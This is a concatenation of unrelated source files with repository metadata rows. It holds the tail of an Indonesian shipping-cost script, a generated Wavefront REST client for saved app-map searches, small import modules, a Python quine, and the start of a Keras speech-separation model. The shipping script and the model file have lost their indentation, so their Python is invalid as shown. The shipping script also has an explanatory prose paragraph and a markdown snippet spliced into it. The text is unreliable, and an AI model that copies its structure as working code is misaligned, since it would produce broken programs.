ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Bekasi":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
    # Packages originating from Malang
elif AsalP == "Malang":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Bekasi":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
    # Packages originating from Cilacap
elif AsalP == "Cilacap":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Bekasi":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
    # Packages originating from Brebes
    # (fixed a copy-paste bug: this branch tested "Bekasi" again and was unreachable)
    elif AsalP == "Brebes":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Bekasi":
ongkir = 33000
result()
menu()
pilih = int(input('Please choose : '))
if pilih == 1:
    kirimPaket()
else:
    cekOnkir()
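The repeated if/elif ladders above encode a flat per-kg rate table. The same lookup can be sketched as a dictionary keyed by (origin, destination); the rates below are copied from the Surabaya branch, and the remaining city pairs would be filled in the same way:

```python
# Sketch only: per-kg rates keyed by (origin, destination).
ONGKIR_PER_KG = {
    ("Surabaya", "Bekasi"): 45000,
    ("Surabaya", "Jakarta"): 50000,
    ("Surabaya", "Cikarang"): 40000,
    ("Surabaya", "Jogja"): 25000,
    ("Surabaya", "Malang"): 30000,
    ("Surabaya", "Cilacap"): 44000,
    ("Surabaya", "Brebes"): 42000,
}

def total_ongkir(asal, tujuan, berat):
    """Total shipping cost, or None when the route is not served."""
    rate = ONGKIR_PER_KG.get((asal, tujuan))
    return None if rate is None else rate * berat
```

This replaces the silent fall-through of the original ladders with an explicit `None` for unknown routes.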
f2fbc40499f546e3bbfb158071cbde1b4a268523 | 33,689 | py | Python | wavefront_api_client/api/saved_app_map_search_api.py | httpsgithu/python-client | f85a530367cdabe458a11919ad35609b9bc0606b | [
"Apache-2.0"
] | null | null | null | wavefront_api_client/api/saved_app_map_search_api.py | httpsgithu/python-client | f85a530367cdabe458a11919ad35609b9bc0606b | [
"Apache-2.0"
] | null | null | null | wavefront_api_client/api/saved_app_map_search_api.py | httpsgithu/python-client | f85a530367cdabe458a11919ad35609b9bc0606b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
    Wavefront REST API Documentation

    <p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p>  # noqa: E501

    OpenAPI spec version: v2
    Contact: chitimba@wavefront.com
    Generated by: https://github.com/swagger-api/swagger-codegen.git
"""

from __future__ import absolute_import

import re  # noqa: F401

# python 2 and python 3 compatibility library
import six

from wavefront_api_client.api_client import ApiClient
class SavedAppMapSearchApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client
    def create_saved_app_map_search(self, **kwargs):  # noqa: E501
        """Create a search  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_saved_app_map_search(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
        :return: ResponseContainerSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.create_saved_app_map_search_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.create_saved_app_map_search_with_http_info(**kwargs)  # noqa: E501
            return data

    def create_saved_app_map_search_with_http_info(self, **kwargs):  # noqa: E501
        """Create a search  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_saved_app_map_search_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
        :return: ResponseContainerSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_saved_app_map_search" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
            '/api/v2/savedappmapsearch', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ResponseContainerSavedAppMapSearch',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def delete_saved_app_map_search(self, id, **kwargs):  # noqa: E501
        """Delete a search  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_saved_app_map_search(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: (required)
        :return: ResponseContainerSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_saved_app_map_search_with_http_info(id, **kwargs)  # noqa: E501
        else:
            (data) = self.delete_saved_app_map_search_with_http_info(id, **kwargs)  # noqa: E501
            return data

    def delete_saved_app_map_search_with_http_info(self, id, **kwargs):  # noqa: E501
        """Delete a search  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_saved_app_map_search_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: (required)
        :return: ResponseContainerSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_saved_app_map_search" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in params or
                                                       params['id'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `id` when calling `delete_saved_app_map_search`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
            '/api/v2/savedappmapsearch/{id}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ResponseContainerSavedAppMapSearch',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def delete_saved_app_map_search_for_user(self, id, **kwargs):  # noqa: E501
        """Delete a search belonging to the user  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_saved_app_map_search_for_user(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: (required)
        :return: ResponseContainerSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_saved_app_map_search_for_user_with_http_info(id, **kwargs)  # noqa: E501
        else:
            (data) = self.delete_saved_app_map_search_for_user_with_http_info(id, **kwargs)  # noqa: E501
            return data

    def delete_saved_app_map_search_for_user_with_http_info(self, id, **kwargs):  # noqa: E501
        """Delete a search belonging to the user  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_saved_app_map_search_for_user_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: (required)
        :return: ResponseContainerSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_saved_app_map_search_for_user" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in params or
                                                       params['id'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `id` when calling `delete_saved_app_map_search_for_user`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
            '/api/v2/savedappmapsearch/owned/{id}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ResponseContainerSavedAppMapSearch',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def get_all_saved_app_map_searches(self, **kwargs):  # noqa: E501
        """Get all searches for a customer  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_saved_app_map_searches(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int offset:
        :param int limit:
        :return: ResponseContainerPagedSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_all_saved_app_map_searches_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_all_saved_app_map_searches_with_http_info(**kwargs)  # noqa: E501
            return data

    def get_all_saved_app_map_searches_with_http_info(self, **kwargs):  # noqa: E501
        """Get all searches for a customer  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_saved_app_map_searches_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int offset:
        :param int limit:
        :return: ResponseContainerPagedSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['offset', 'limit']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_all_saved_app_map_searches" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'offset' in params:
            query_params.append(('offset', params['offset']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
            '/api/v2/savedappmapsearch', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ResponseContainerPagedSavedAppMapSearch',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def get_all_saved_app_map_searches_for_user(self, **kwargs):  # noqa: E501
        """Get all searches for a user  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_saved_app_map_searches_for_user(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int offset:
        :param int limit:
        :return: ResponseContainerPagedSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_all_saved_app_map_searches_for_user_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_all_saved_app_map_searches_for_user_with_http_info(**kwargs)  # noqa: E501
            return data

    def get_all_saved_app_map_searches_for_user_with_http_info(self, **kwargs):  # noqa: E501
        """Get all searches for a user  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_saved_app_map_searches_for_user_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int offset:
        :param int limit:
        :return: ResponseContainerPagedSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['offset', 'limit']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_all_saved_app_map_searches_for_user" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'offset' in params:
            query_params.append(('offset', params['offset']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
            '/api/v2/savedappmapsearch/owned', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ResponseContainerPagedSavedAppMapSearch',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def get_saved_app_map_search(self, id, **kwargs):  # noqa: E501
        """Get a specific search  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_saved_app_map_search(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: (required)
        :return: ResponseContainerSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_saved_app_map_search_with_http_info(id, **kwargs)  # noqa: E501
        else:
            (data) = self.get_saved_app_map_search_with_http_info(id, **kwargs)  # noqa: E501
            return data

    def get_saved_app_map_search_with_http_info(self, id, **kwargs):  # noqa: E501
        """Get a specific search  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_saved_app_map_search_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: (required)
        :return: ResponseContainerSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_saved_app_map_search" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in params or
                                                       params['id'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `id` when calling `get_saved_app_map_search`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
            '/api/v2/savedappmapsearch/{id}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ResponseContainerSavedAppMapSearch',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def update_saved_app_map_search(self, id, **kwargs):  # noqa: E501
        """Update a search  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_saved_app_map_search(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: (required)
        :param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
        :return: ResponseContainerSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.update_saved_app_map_search_with_http_info(id, **kwargs)  # noqa: E501
        else:
            (data) = self.update_saved_app_map_search_with_http_info(id, **kwargs)  # noqa: E501
            return data

    def update_saved_app_map_search_with_http_info(self, id, **kwargs):  # noqa: E501
        """Update a search  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_saved_app_map_search_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: (required)
        :param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
        :return: ResponseContainerSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['id', 'body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_saved_app_map_search" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in params or
                                                       params['id'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `id` when calling `update_saved_app_map_search`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
            '/api/v2/savedappmapsearch/{id}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ResponseContainerSavedAppMapSearch',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def update_saved_app_map_search_for_user(self, id, **kwargs):  # noqa: E501
        """Update a search belonging to the user  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_saved_app_map_search_for_user(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: (required)
        :param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
        :return: ResponseContainerSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.update_saved_app_map_search_for_user_with_http_info(id, **kwargs)  # noqa: E501
        else:
            (data) = self.update_saved_app_map_search_for_user_with_http_info(id, **kwargs)  # noqa: E501
            return data

    def update_saved_app_map_search_for_user_with_http_info(self, id, **kwargs):  # noqa: E501
        """Update a search belonging to the user  # noqa: E501

        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_saved_app_map_search_for_user_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: (required)
        :param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
        :return: ResponseContainerSavedAppMapSearch
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['id', 'body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_saved_app_map_search_for_user" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in params or
                                                       params['id'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `id` when calling `update_saved_app_map_search_for_user`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
            '/api/v2/savedappmapsearch/owned/{id}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ResponseContainerSavedAppMapSearch',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
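Every public method in this generated client follows the same dispatch shape: force `_return_http_data_only`, then either hand back the worker thread (`async_req=True`) or unwrap the payload. A minimal stand-in illustrating just that pattern — the class and method names here are hypothetical and no HTTP is involved:

```python
class MiniApi:
    """Toy client mirroring the swagger-codegen wrapper pattern above."""

    def get_thing(self, **kwargs):
        # Same shape as create_saved_app_map_search(): always request
        # data-only, then unwrap unless the caller asked for the thread.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_thing_with_http_info(**kwargs)
        (data) = self.get_thing_with_http_info(**kwargs)
        return data

    def get_thing_with_http_info(self, **kwargs):
        # Stand-in for api_client.call_api(): returns a fake "thread"
        # when async, otherwise the payload directly.
        payload = {"id": "abc123"}
        if kwargs.get('async_req'):
            return ("pretend-thread", payload)
        return payload
```

The sync path returns the payload itself; the async path returns whatever the transport hands back, and the caller is expected to call `.get()` on it (as the `>>> thread.get()` examples in the docstrings show).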
# ---- 09/01/call_0.py (pylangstudy/201706, CC0-1.0) ----

import some_module_0
some_module_0.some_method()
# ---- neater/__init__.py (ju-leon/torch-neuroevolution, MIT) ----

from neater.network import Network
from neater.agent import Agent
from neater.strategies.neat.neat import Neat
from neater.strategies.strategy import Strategy
#from neat.ext import Node
# ---- david/typing/__init__.py (arthurTemporim/david, MIT) ----

from david.typing.message import Message
from david.typing.model import Model
from david.typing.module import Module
from david.typing.training_data import TrainingData
# ---- basic/python/main.py (oglinuk/quines, Apache-2.0) ----

s="s={}{}{}{}print(s.format(chr(34),s,chr(34),chr(10)))"
print(s.format(chr(34),s,chr(34),chr(10)))
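The one-liner above reproduces its own source by substituting `chr(34)` (a double quote) and `chr(10)` (a newline) into its template string, so neither character has to appear literally inside the template. A variant of the same trick — my sketch, not from the repo — leans on `{!r}` so that `repr` handles the quoting instead:

```python
# Self-reproducing two-liner: repr() re-creates the quotes and the
# escaped newline, so s.format(s) yields exactly this source text.
s = 's = {!r}\nprint(s.format(s))'
print(s.format(s))
```

Both versions work because the data (the template string) and the code that prints it are the same text, just reached through one level of escaping.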
# ---- models.py (yanis-k/BSSS, MIT) ----

import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import Model
from tensorflow.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D, Reshape, \
BatchNormalization, Input
from tensorflow.keras.layers import LSTM, Concatenate, LeakyReLU
from keras.losses import mean_squared_error
def custom_mse(x):
"""
Permutation Invariant Training (PIT) custom MSE loss.
Keras implementation.
Used to train the CRNN with PIT.
"""
def pit_loss(y_true, y_pred):
cost1 = mean_squared_error(y_pred[x], y_true[x])
def c1(): return tf.reduce_mean(cost1)
cost2 = mean_squared_error(y_pred[x - 1], y_true[x])
def c2(): return tf.reduce_mean(cost2)
result = tf.cond(tf.less(tf.reduce_mean(cost1), tf.reduce_mean(cost2)), c1, c2)
return result
return pit_loss
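The tf.cond selection above can be illustrated with a pure-NumPy sketch (pit_mse is a hypothetical helper, not part of models.py): it evaluates the MSE under both speaker assignments and keeps the smaller one, which is the essence of permutation invariant training for two sources.

```python
import numpy as np

def pit_mse(y_true, y_pred):
    # y_true, y_pred: shape (2, ...) -- one row per speaker.
    # Direct assignment: prediction i compared with target i.
    direct = np.mean((y_pred - y_true) ** 2)
    # Swapped assignment: predictions compared in reverse speaker order.
    swapped = np.mean((y_pred[::-1] - y_true) ** 2)
    # Keep the cheaper assignment, as tf.cond does in pit_loss.
    return min(direct, swapped)

y_true = np.array([[1.0, 1.0], [0.0, 0.0]])
y_swapped = y_true[::-1]  # network emitted the speakers in the wrong order
assert pit_mse(y_true, y_swapped) == 0.0
```

Unlike this sketch, custom_mse above fixes one output index per loss term, so the two per-output losses jointly realize the same min-over-permutations behaviour.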
def bl_dnn_mimo(bins, hl_nodes):
"""
Baseline DNN model, used as a reference
Outputs: [Speaker1, Speaker2]
:param bins: number of frequency bins
